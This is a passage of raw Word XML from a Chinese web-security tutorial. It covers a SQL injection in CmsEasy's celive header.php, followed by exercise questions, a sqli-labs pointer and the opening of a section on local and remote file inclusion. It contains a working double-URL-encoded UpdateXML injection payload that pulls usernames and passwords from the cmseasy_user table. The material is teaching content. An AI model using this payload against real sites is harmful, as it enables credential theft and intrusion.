        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> Postdata($a) { global $db;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$chatid = $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>SESSION[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'chatid'];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$name = $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>SESSION[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'name'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="83" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="2351"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>a[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'detail'] = htmlspecialchars($a['detail']); if (!get_magic_quotes_gpc()) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>a[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'detail'] = addslashes($a['detail']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="127" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1583"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果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gpc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就不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行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addslashes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好的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直接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exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          </w:rPr>
          <w:t>http://localhost/Cmseasy/celive/live/header.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="28" w:line="652" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>postdata</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>xajax=Postdata&amp;xajaxargs[0]=&lt;xjxquery&gt;&lt;q&gt;detail=xxxxxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="319" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">%2527%252C%2528UpdateXML%25281%252CCONCAT%252 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>80x5b%252Cmid%2528%2528SELECT%252f%252a%252a%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3" w:line="321" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">252fGROUP_CONCAT%2528concat%2528username%252C%2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>527%257C%2527%252Cpassword%2529%2529%2520from%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="321" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="455"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">2520cmseasy_user%2529%252C1%252C32%2529%252C0x5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>d%2529%252C1%2529%2529%252CNULL%252CNULL%252 CNULL%252CNULL%252CNUL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>L%252CNULL%2529--%2520&lt;/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="241" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>q&gt;&lt;/xjxquery&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="178" w:line="499" w:lineRule="auto"/>
        <w:ind w:right="4623"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>练习题：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入有几种类型？</w:t>
      </w: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spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="31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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是否所有数据库都受到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24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spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="17"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="26" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="2599"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="文件包含"/>
      <w:bookmarkStart w:id="32" w:name="_bookmark15"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实践：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqli-labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>练习一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://github.com/Audi-1/sqli-labs</w:t>
      </w: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rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="25"/>
          <w:lang w:eastAsia="zh-CN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44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="61"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="1"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件包含漏洞即当程序员在包含文件的过程中引入了外部提交的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据参与包含的过程所产生的漏洞，这个漏洞是目前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击中最利</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr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417" w:right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lastRenderedPageBreak/>
        <w:t>用率最高的一个漏洞，攻击者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可以轻松获取服务器的访问权限（即拿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到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）。而文件包含通常又有本地文件包含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417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pacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99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1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Inclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）和远程文件包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(Remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Inclusion)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99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之分。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>allow_url_fopen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-18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和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-19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allow_url_include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-18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是决定包含属于本地文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件包含（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）还是远程文件包含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（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）的条件，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中则只有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一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-19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allow_url_fopen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-18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选择。其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-18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allow_url_fopen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和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的情况为远程文件包含漏洞，相反为本地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文件包含漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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什么才是“远程文件包含漏洞”？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="420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服务器通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-34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的特性（函数）去包含任意文件时，由于要包含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的这个文件来源过滤不严，从而可以去包含一个恶意文件，而我们可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以构造这个恶意文件来达到邪恶的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="17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4893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涉及到的危险函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> include_once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> require_once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
